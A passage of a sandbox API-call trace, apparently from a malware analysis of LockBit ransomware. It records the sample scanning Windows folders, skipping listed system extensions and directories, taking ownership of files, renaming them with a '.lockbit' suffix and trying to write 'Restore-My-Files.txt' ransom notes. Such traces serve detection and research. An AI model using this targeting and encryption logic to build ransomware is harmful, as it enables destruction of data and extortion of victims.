returned -1 [0088.129] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0088.129] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0088.129] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0088.129] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0088.129] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0088.129] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0088.129] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0088.129] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0088.129] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0088.129] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0088.129] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0088.129] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0088.129] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0088.129] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0088.129] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0088.130] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0088.130] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0088.130] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0088.130] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0088.130] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0088.130] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0088.130] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0088.130] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0088.130] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0088.130] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0088.130] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0088.130] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0088.130] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0088.130] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0088.130] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0088.130] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0088.130] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0088.130] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0088.130] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0088.130] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0088.131] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0088.131] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="symbase.xml") returned -1 [0088.131] lstrcmpiW (lpString1="ntldr", lpString2="symbase.xml") returned -1 [0088.131] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="symbase.xml") returned -1 [0088.131] lstrcmpiW (lpString1="bootsect.bak", lpString2="symbase.xml") returned -1 [0088.131] lstrcmpiW (lpString1="autorun.inf", lpString2="symbase.xml") returned -1 [0088.131] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\") returned="" [0088.131] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned=".xml" [0088.131] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0088.131] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0088.131] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0088.131] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0088.131] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0088.131] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0088.131] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0088.131] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0088.131] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0088.131] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0088.131] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0088.132] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0088.132] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0088.132] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0088.132] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0088.132] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0088.132] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0088.132] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0088.132] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0088.132] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0088.132] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0088.132] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0088.132] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0088.132] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0088.132] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0088.132] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0088.132] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0088.132] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0088.132] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.lockbit") returned 93 [0088.132] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0088.133] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml.lockbit")) returned 0 [0088.133] GetLastError () returned 0x5 [0088.133] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0088.133] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0088.133] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0088.134] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0088.134] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0088.134] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3c4, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0088.135] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0088.135] NtQueryInformationFile (in: FileHandle=0x3c4, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0088.166] NtClose (Handle=0x3c4) returned 0x0 [0088.166] RtlFreeAnsiString (AnsiString="\\") [0088.166] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3c4) returned 1 [0088.166] malloc (_Size=0x200) returned 0x53fcc0 [0088.166] GetTokenInformation (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0088.166] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0088.166] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0088.166] CloseHandle (hObject=0x3c4) returned 1 [0088.166] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0088.166] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0088.167] free (_Block=0x53fcc0) [0088.167] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0088.167] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml.lockbit")) returned 1 [0088.167] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0088.168] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0088.168] malloc (_Size=0x40068) returned 0x206b860 [0088.168] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=2764) returned 1 [0088.168] ReadFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0088.226] GetLastError () returned 0x3e5 [0088.226] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols") returned 1 [0088.226] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\Restore-My-Files.txt") returned 94 [0088.226] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.226] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9003b703, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9003b703, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xacc, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="symbase.xml", cAlternateFileName="")) returned 0 [0088.226] GetLastError () returned 0x12 [0088.226] FindClose (in: hFindFile=0x2e32d0 | out: hFindFile=0x2e32d0) returned 1 [0088.226] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe7269b, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe7269b, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe7269b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x24f, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="symbols.xml", cAlternateFileName="")) returned 1 [0088.226] lstrcmpiW (lpString1=".", lpString2="symbols.xml") returned -1 [0088.230] lstrcmpiW (lpString1="..", lpString2="symbols.xml") returned -1 [0088.230] PathFindExtensionW (pszPath="symbols.xml") returned=".xml" [0088.230] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0088.230] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0088.230] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0088.230] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0088.236] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0088.237] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0088.237] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0088.237] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0088.237] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0088.237] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0088.237] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0088.237] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0088.237] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0088.237] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0088.237] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0088.237] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0088.237] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0088.237] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0088.237] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0088.237] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0088.237] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0088.237] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0088.237] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0088.237] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0088.237] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="symbols.xml") returned -1 [0088.237] lstrcmpiW (lpString1="ntldr", lpString2="symbols.xml") returned -1 [0088.237] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="symbols.xml") returned -1 [0088.237] lstrcmpiW (lpString1="bootsect.bak", lpString2="symbols.xml") returned -1 [0088.237] lstrcmpiW (lpString1="autorun.inf", lpString2="symbols.xml") returned -1 [0088.237] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\") returned="" [0088.237] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml") returned=".xml" [0088.237] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0088.237] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0088.237] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0088.237] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0088.237] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0088.237] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0088.238] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0088.238] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0088.238] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0088.238] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0088.238] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0088.238] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0088.238] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0088.238] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0088.238] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0088.238] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0088.238] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0088.238] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0088.238] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0088.238] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0088.238] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0088.238] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0088.238] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0088.238] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0088.238] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0088.238] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0088.238] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0088.238] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0088.238] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.lockbit") returned 85 [0088.238] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0088.238] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml.lockbit")) returned 0 [0089.251] GetLastError () returned 0x5 [0089.251] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0089.251] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0089.251] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0089.251] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0089.252] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0089.252] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3c4, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0089.252] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0089.252] NtQueryInformationFile (in: FileHandle=0x3c4, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0089.397] NtClose (Handle=0x3c4) returned 0x0 [0089.398] RtlFreeAnsiString (AnsiString="\\") [0089.398] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3c4) returned 1 [0089.398] malloc (_Size=0x200) returned 0x53fcc0 [0089.398] GetTokenInformation (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0089.398] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0089.398] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0089.398] CloseHandle (hObject=0x3c4) returned 1 [0089.398] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0089.398] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0089.399] free (_Block=0x53fcc0) [0089.399] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0089.399] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml.lockbit")) returned 1 [0089.399] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0089.399] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0089.399] malloc (_Size=0x40068) returned 0x206b860 [0089.399] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=591) returned 1 [0089.400] ReadFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 0x0 [0089.404] GetLastError () returned 0x3e5 [0089.404] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions") returned 1 [0089.404] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Restore-My-Files.txt") returned 86 [0089.404] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0089.404] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="web", cAlternateFileName="")) returned 1 [0089.404] lstrcmpiW (lpString1=".", lpString2="web") returned -1 [0089.404] lstrcmpiW (lpString1="..", lpString2="web") returned -1 [0089.404] lstrcmpiW (lpString1="web", lpString2="$windows.~bt") returned 1 [0089.404] lstrcmpiW (lpString1="web", lpString2="intel") returned 1 [0089.404] lstrcmpiW (lpString1="web", lpString2="msocache") returned 1 [0089.404] lstrcmpiW (lpString1="web", lpString2="$recycle.bin") returned 1 [0089.404] lstrcmpiW (lpString1="web", lpString2="$windows.~ws") returned 1 [0089.404] lstrcmpiW (lpString1="web", lpString2="tor browser") returned 1 [0089.404] lstrcmpiW (lpString1="web", lpString2="boot") returned 1 [0089.404] lstrcmpiW (lpString1="web", lpString2="system volume information") returned 1 [0089.404] lstrcmpiW (lpString1="web", lpString2="perflogs") returned 1 [0089.404] lstrcmpiW (lpString1="web", lpString2="google") returned 1 [0089.404] lstrcmpiW (lpString1="web", lpString2="application data") returned 1 [0089.404] lstrcmpiW (lpString1="web", lpString2="windows") returned -1 [0089.404] lstrcmpiW (lpString1="web", lpString2="windows.old") returned -1 [0089.404] lstrcmpiW (lpString1="web", lpString2="appdata") returned 1 [0089.404] lstrcmpiW (lpString1="web", lpString2="Windows nt") returned -1 [0089.404] lstrcmpiW (lpString1="web", lpString2="Msbuild") returned 1 [0089.404] lstrcmpiW (lpString1="web", lpString2="Microsoft") returned 1 [0089.405] lstrcmpiW (lpString1="web", lpString2="All users") returned 1 [0089.405] lstrcmpiW (lpString1="web", lpString2="mozilla") returned 1 [0089.405] wsprintfW (in: param_1=0x344ca60, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web") returned 69 [0089.405] wsprintfW (in: param_1=0x344c2c0, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft 